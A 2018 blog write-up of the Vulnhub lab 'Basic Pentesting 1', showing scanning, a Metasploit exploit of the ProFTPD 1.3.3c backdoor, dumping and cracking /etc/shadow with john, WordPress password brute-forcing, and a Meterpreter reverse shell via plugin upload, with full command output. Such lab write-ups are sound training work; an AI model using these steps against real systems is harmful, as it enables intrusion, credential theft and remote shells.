Не важно, как медленно ты продвигаешься, главное, что ты не останавливаешься.


Wednesday, 21 February 2018

[Vulnhub] Basic Pentesting 1

This is my write up how to pwn this box, if you have another solution, please comment below.

You can download the box on this link https://www.vulnhub.com/entry/basic-pentesting-1,216/

Information Gathering

First, I want to know virtualbox IP address that assigned to the box.
root@sempur:~# netdiscover -r 192.168.40.0/24 -i eth1
Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.40.1    08:00:27:ce:cd:b1      1      60  PCS Systemtechnik GmbH      
 192.168.40.1    0a:00:27:00:00:0a      1      60  Unknown vendor              
 192.168.40.100  08:00:27:14:06:50      1      60  PCS Systemtechnik GmbH 
* this result maybe difference, based on your virtualbox configuration

After that, I want to know what services are running on this box. In this case, I used Nmap to know version, port, OS, etc.
root@sempur:~# nmap -sV 192.168.40.100

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-12 15:24 WIB
Nmap scan report for 192.168.40.100
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds
You can see the result, there is FTP, SSH, HTTP services running on this box. I need to know, which services are vulnerable.

Exploring FTP service

Based on nmap result, this server using ProFTPD version 1.3.3c which is vulnerable to backdoor command execution. You can find by googling or using searchsploit for more information.

https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor
root@sempur:~# msfconsole
msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(proftpd_133c_backdoor) > set rhost 192.168.40.100
rhost => 192.168.40.100
msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.40.101:4444 
[*] 192.168.40.100:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qZBpq8Ol9KN6lYs4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qZBpq8Ol9KN6lYs4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.40.101:4444 -> 192.168.40.100:39812) at 2018-02-21 13:59:27 +0700

whoami
root
By using this exploit, you got root access, so you can explore this box as root.

Accessing SSH

After I got root by exploiting ProFTPD, I try to find another way to get in the box. Based on nmap result, there is SSH service running on this box. So, I think I can use this way to login as another user. I can use /etc/passwd and /etc/shadow to get password using john.

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

/etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:*:17379:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::

root@sempur:~# unshadow passwd shadow > p.txt
root@sempur:~# john p.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-02-21 11:34) 11.11g/s 88.88p/s 88.88c/s 88.88C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@sempur:~# john --show p.txt
marlinspike:marlinspike:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash

1 password hash cracked, 0 left
As you can see, john got password for marlinspike user. So, I try to login via SSH by using marlinspike as username and password. Apparently, user marlinspike is sudoers member.
root@sempur:~# ssh marlinspike@192.168.40.100
marlinspike@192.168.40.100's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 packages can be updated.
19 updates are security updates.

Last login: Mon Feb 12 06:50:26 2018 from 192.168.40.101
marlinspike@vtcsec:~$ whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
[sudo] password for marlinspike: 
root@vtcsec:/home/marlinspike# whoami
root
root@vtcsec:/home/marlinspike# 

Exploring HTTP Service

I try to bruteforce directory using dirb and I got that website made by wordpress on directory secret.
*You need add local DNS in file /etc/hosts
127.0.0.1            localhost
192.168.40.100       vtcsec

root@sempur:~# dirb http://192.168.40.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb 21 09:51:10 2018
URL_BASE: http://192.168.40.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.40.100/ ----
+ http://192.168.40.100/index.html (CODE:200|SIZE:177)                         
==> DIRECTORY: http://192.168.40.100/secret/                                   
+ http://192.168.40.100/server-status (CODE:403|SIZE:302)                      
                                                                               
---- Entering directory: http://192.168.40.100/secret/ ----
+ http://192.168.40.100/secret/index.php (CODE:301|SIZE:0)                     
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/                          
==> DIRECTORY: http://192.168.40.100/secret/wp-content/                        
==> DIRECTORY: http://192.168.40.100/secret/wp-includes/                       
+ http://192.168.40.100/secret/xmlrpc.php (CODE:405|SIZE:42)                   
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/ ----
+ http://192.168.40.100/secret/wp-admin/admin.php (CODE:302|SIZE:0)            
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/css/                      
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/images/                   
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/includes/                 
+ http://192.168.40.100/secret/wp-admin/index.php (CODE:302|SIZE:0)            
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/js/                       
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/maint/                    
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/network/                  
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/user/                     
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/ ----
+ http://192.168.40.100/secret/wp-content/index.php (CODE:200|SIZE:0)          
==> DIRECTORY: http://192.168.40.100/secret/wp-content/plugins/                
==> DIRECTORY: http://192.168.40.100/secret/wp-content/themes/                 
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/network/ ----
+ http://192.168.40.100/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)    
+ http://192.168.40.100/secret/wp-admin/network/index.php (CODE:302|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/user/ ----
+ http://192.168.40.100/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)       
+ http://192.168.40.100/secret/wp-admin/user/index.php (CODE:302|SIZE:0)       
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/plugins/ ----
+ http://192.168.40.100/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/themes/ ----
+ http://192.168.40.100/secret/wp-content/themes/index.php (CODE:200|SIZE:0)   
                                                                               
-----------------
END_TIME: Wed Feb 21 09:51:33 2018
DOWNLOADED: 36896 - FOUND: 13

Next, I use wpscan to find more information about this website.
root@sempur:~# wpscan --url http://vtcsec/secret/ --enumerate u
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:09:38 2018

[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/

[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1

[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8968
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: twentyseventeen - v1.4

[+] Name: twentyseventeen - v1.4
 |  Latest version: 1.4 (up to date)
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 |  Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------------------+
    | Id | Login | Name              |
    +----+-------+-------------------+
    | 1  | admin | admin – My secret |
    +----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Thu Feb 22 16:09:44 2018
[+] Requests Done: 103
[+] Memory used: 39.34 MB
[+] Elapsed time: 00:00:06
I got username, admin. So, I try to guess password 'admin', then I can log in to admin panel. Or, If you want using tool to bruteforce password, you can use wpscan to get password.
root@sempur:~# wpscan --url http://vtcsec/secret/ --username admin --wordlist /usr/share/wordlists/fasttrack.txt 
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:35:23 2018

[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/

[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1

[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8968
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: twentyseventeen - v1.4

[+] Name: twentyseventeen - v1.4
 |  Latest version: 1.4 (up to date)
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 |  Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : admin Password : admin                                  

  Brute Forcing 'admin' Time: 00:00:02 <==   > (130 / 223) 58.29%  ETA: 00:00:02
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | admin |      | admin    |
  +----+-------+------+----------+

[+] Finished: Thu Feb 22 16:35:30 2018
[+] Requests Done: 225
[+] Memory used: 37.777 MB
[+] Elapsed time: 00:00:06

Get The Shell

After i got username and password, i need to get shell from this way. I use metasploit to upload the backdoor, and access the shell from msfconsole.

https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload

root@sempur:~# msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/unix/webapp/wp_admin_shell_upload 
msf exploit(wp_admin_shell_upload) > set username admin
username => admin
msf exploit(wp_admin_shell_upload) > set password admin
password => admin
msf exploit(wp_admin_shell_upload) > set rhost vtcsec
rhost => vtcsec
msf exploit(wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(wp_admin_shell_upload) > show options
msf exploit(wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.40.101:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/fVdnYcKEGU/nrdKKXzecZ.php...
[*] Sending stage (37543 bytes) to 192.168.40.100
[*] Meterpreter session 1 opened (192.168.40.101:4444 -> 192.168.40.100:45522) at 2018-02-22 15:15:44 +0700
[+] Deleted nrdKKXzecZ.php
[+] Deleted fVdnYcKEGU.php

meterpreter > sysinfo
Computer    : vtcsec
OS          : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell 
whoami
www-data

Finally, i got shell from metasploit, but the user still www-data, if you want get root permission, you need escalate the privilege. Exploiting the FTP server is the best way to get root access (in my opinion).



5 λ .: [Vulnhub] Basic Pentesting 1 This is my write up how to pwn this box, if you have another solution, please comment below. You can download the box on this link https:/...

5 comments:

  1. that is very awesome and easy to understand!
    I will try it And keep in touch with result ASAP
    thank you dear !

    ReplyDelete
    Replies
    1. thanks dude, appreciate

      Delete
    2. hello dear,
      there is an error in exploit module
      it gave me
      "Exploit aborted due to failure: unexpected-reply: Failed to upload the payload"

      what is the solution for that?

      Delete
    3. I had the same problem, but i solved it by modifiying the lab vm network. Change the vm lab network from Host only to Nat.

      Have fun.

      Delete
  2. This comment has been removed by the author.

    ReplyDelete

< >